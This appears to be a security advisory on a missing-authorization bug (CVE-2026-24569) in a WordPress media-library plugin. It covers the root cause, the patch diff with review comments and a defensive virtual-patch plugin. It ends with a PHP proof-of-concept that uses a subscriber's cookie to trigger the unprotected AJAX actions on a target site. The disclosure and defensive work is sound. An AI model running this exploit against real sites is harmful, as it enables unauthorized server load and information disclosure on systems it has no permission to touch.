Atomic Edge analysis of CVE-2026-24569:
The Media Library File Size plugin for WordPress, versions up to and including 1.6.7, contains a missing authorization vulnerability. This flaw allows authenticated attackers with Subscriber-level permissions or higher to trigger administrative functions, leading to unauthorized data access and potential server resource exhaustion.
Atomic Edge research identifies the root cause as a missing capability check within two AJAX handler functions. The vulnerable functions `index()` and `indexCount()` are defined in the main plugin file `media-library-file-size/ss88-media-library-file-size.php` and are hooked to the WordPress AJAX actions `wp_ajax_ss88_mlfs_index` and `wp_ajax_ss88_mlfs_indexCount`. The code diff shows that, prior to version 1.6.8, these functions (at lines 100 and 189 respectively) performed no authorization check before executing their logic.
Exploitation requires an authenticated attacker with any valid WordPress account. The attacker sends a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the `action` parameter set to either `ss88_mlfs_index` or `ss88_mlfs_indexCount`. No other parameters and no nonce are required. Triggering `index()` initiates a resource-intensive file size indexing operation; triggering `indexCount()` returns the total calculated file size stored in the database.
The patch in version 1.6.8 adds an authorization check at the beginning of both vulnerable functions. The fix inserts the line `if(!current_user_can('manage_options')) wp_send_json_error(['error' => 'You need to be an administrator.']);` before any other logic in the `index()` and `indexCount()` functions. This check ensures that only users with the `manage_options` capability, typically Administrators, can execute these functions. The patch also adds the standard direct-access guard (`if ( ! defined( 'ABSPATH' ) ) exit;`) at the top of the plugin file and updates the plugin metadata.
Successful exploitation allows a low-privileged user to perform actions reserved for administrators. Triggering the `index()` function can cause significant server load by forcing a re-indexing of all media library file sizes, potentially leading to a denial-of-service condition. The `indexCount()` function discloses the total file size of the media library, which is sensitive operational data that could aid in further attacks. This constitutes a broken access control issue.
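As an added defensive example (not Atomic Edge's analysis code and not part of the plugin), the following must-use plugin virtually patches a site still running version 1.6.7 by rejecting non-administrators on both AJAX actions before the plugin's own handlers execute, and logging the blocked attempt. It assumes the plugin registers its handlers at the default hook priority (10), so a priority-0 callback runs first, and relies on `wp_send_json_error()` ending the request via `wp_die()`.

```php
<?php
/*
Plugin Name: MLFS Virtual Patch (CVE-2026-24569)
Description: Blocks non-administrators from the Media Library File Size AJAX actions until the plugin is updated to 1.6.8 or later.
*/
// Place this file in wp-content/mu-plugins/ so it loads before regular plugins.
if ( ! defined( 'ABSPATH' ) ) exit;

// The two AJAX actions exposed by media-library-file-size <= 1.6.7 without a capability check.
const MLFS_VP_ACTIONS = array( 'ss88_mlfs_index', 'ss88_mlfs_indexCount' );

function mlfs_vp_guard() {
    if ( current_user_can( 'manage_options' ) ) {
        return; // Administrator: fall through to the plugin's own handler.
    }
    $action = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : '(none)';
    $ip     = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';
    // Leave an audit trail for the incident responder before refusing the request.
    error_log( sprintf( 'MLFS virtual patch: blocked action=%s user_id=%d ip=%s', $action, get_current_user_id(), $ip ) );
    // Same response body as the 1.6.8 fix, with an explicit 403; wp_send_json_error() calls wp_die(),
    // so the vulnerable handler registered at the default priority never runs.
    wp_send_json_error( array( 'error' => 'You need to be an administrator.' ), 403 );
}

function mlfs_vp_register() {
    if ( ! function_exists( 'is_plugin_active' ) ) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    // Only arm the guard while the affected plugin is active (hypothetical check; harmless if left in place after updating).
    if ( ! is_plugin_active( 'media-library-file-size/ss88-media-library-file-size.php' ) ) {
        return;
    }
    foreach ( MLFS_VP_ACTIONS as $action ) {
        // Priority 0 runs ahead of the plugin's handler, which is assumed to use the default priority 10.
        add_action( 'wp_ajax_' . $action, 'mlfs_vp_guard', 0 );
    }
}
add_action( 'plugins_loaded', 'mlfs_vp_register' );
```

The guard is a stop-gap: updating to 1.6.8 remains the fix, and a nonce check belongs in the plugin itself since its JavaScript would have to send the nonce.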
--- a/media-library-file-size/ss88-media-library-file-size.php
+++ b/media-library-file-size/ss88-media-library-file-size.php
@@ -1,17 +1,21 @@
<?php
/*
Plugin Name: Media Library File Size
-Plugin URI: https://ss88.us/plugins/media-library-file-size?utm_source=wordpress&utm_medium=link&utm_campaign=mlfs
+Plugin URI: https://neoboffin.com/plugins/media-library-file-size?utm_source=wordpress&utm_medium=link&utm_campaign=mlfs
Description: Creates a new column in your Media Library to show you the file (and collective images) size of files plus more!
-Version: 1.6.7
-Author: SS88 LLC
-Author URI: https://ss88.us/?utm_source=wordpress&utm_medium=link&utm_campaign=author_mlfs
+Version: 1.6.8
+Author: Neoboffin LLC
+Author URI: https://neoboffin.com/?utm_source=wordpress&utm_medium=link&utm_campaign=author_mlfs
Text Domain: media-library-file-size
+License: GPL2
+License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
+if ( ! defined( 'ABSPATH' ) ) exit;
+
class SS88_MediaLibraryFileSize {
- protected $version = '1.6.7';
+ protected $version = '1.6.8';
protected $variantJSON = [];
public static function init() {
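Review bot: the `ABSPATH` guard added after the header block only prevents the plugin file from being executed by a direct HTTP request to its path; it has no effect on the AJAX handlers, which are reached through admin-ajax.php with `ABSPATH` already defined, so the authorization checks in the following two hunks are what actually close CVE-2026-24569. The remaining changes here (Plugin URI, Author, version bump to 1.6.8) are metadata only; the new `License: GPL2` and `License URI` headers are worth keeping since the 1.6.7 header block omitted them.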
@@ -100,6 +104,8 @@
function index() {
+ if(!current_user_can('manage_options')) wp_send_json_error(['error' => 'You need to be an administrator.']);
+
set_time_limit(600);
ini_set('max_execution_time', 600);
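Review bot: the capability check correctly sits before `set_time_limit(600)`, and `wp_send_json_error()` terminates the request through `wp_die()`, so no explicit `return` is needed; however no `check_ajax_referer()` is added, so the handler still has no CSRF protection for administrators who are already logged in. Consider adding `check_ajax_referer( 'ss88_mlfs_index', 'nonce' );` next to the capability check, with the plugin's JavaScript passing a value from `wp_create_nonce()`, and wrap the single-line `if` in braces per the WordPress coding standards.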
@@ -189,6 +195,8 @@
function indexCount() {
+ if(!current_user_can('manage_options')) wp_send_json_error(['error' => 'You need to be an administrator.']);
+
global $wpdb;
$TotalMLSize = $wpdb->get_var("SELECT SUM(meta_value) FROM $wpdb->postmeta WHERE meta_key = 'SS88MLFS'");
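Review bot: the guard line is duplicated verbatim from `index()`; moving it into a private helper (e.g. `$this->require_admin();`) or enforcing the capability once where the `wp_ajax_ss88_mlfs_index` and `wp_ajax_ss88_mlfs_indexCount` actions are registered would keep the two handlers from drifting apart if the check is later tightened. The `SUM(meta_value)` query below also depends on MySQL implicitly casting the text `meta_value` column; `SUM(CAST(meta_value AS UNSIGNED))` makes that intent explicit.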
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24569 - Media Library File Size <= 1.6.7 - Missing Authorization
// Configure the target WordPress site URL
$target_url = 'https://vulnerable-site.example.com';
// WordPress AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Set up cURL for the first vulnerable action
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
// Target the function that starts the file size indexing
curl_setopt($ch, CURLOPT_POSTFIELDS, 'action=ss88_mlfs_index');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
// Add WordPress authentication cookies if attacking as a Subscriber
// Replace with a valid logged-in session cookie for the target site
$cookies = 'wordpress_logged_in_xxxx=...';
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
// Execute the request to trigger the unauthorized indexing
$response_index = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[*] Triggering ss88_mlfs_index...\n";
echo " HTTP Code: $http_code\n";
echo " Response: $response_index\n\n";
// Now target the second vulnerable action to retrieve total file size
curl_setopt($ch, CURLOPT_POSTFIELDS, 'action=ss88_mlfs_indexCount');
$response_count = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[*] Triggering ss88_mlfs_indexCount...\n";
echo " HTTP Code: $http_code\n";
echo " Response: $response_count\n";
curl_close($ch);
?>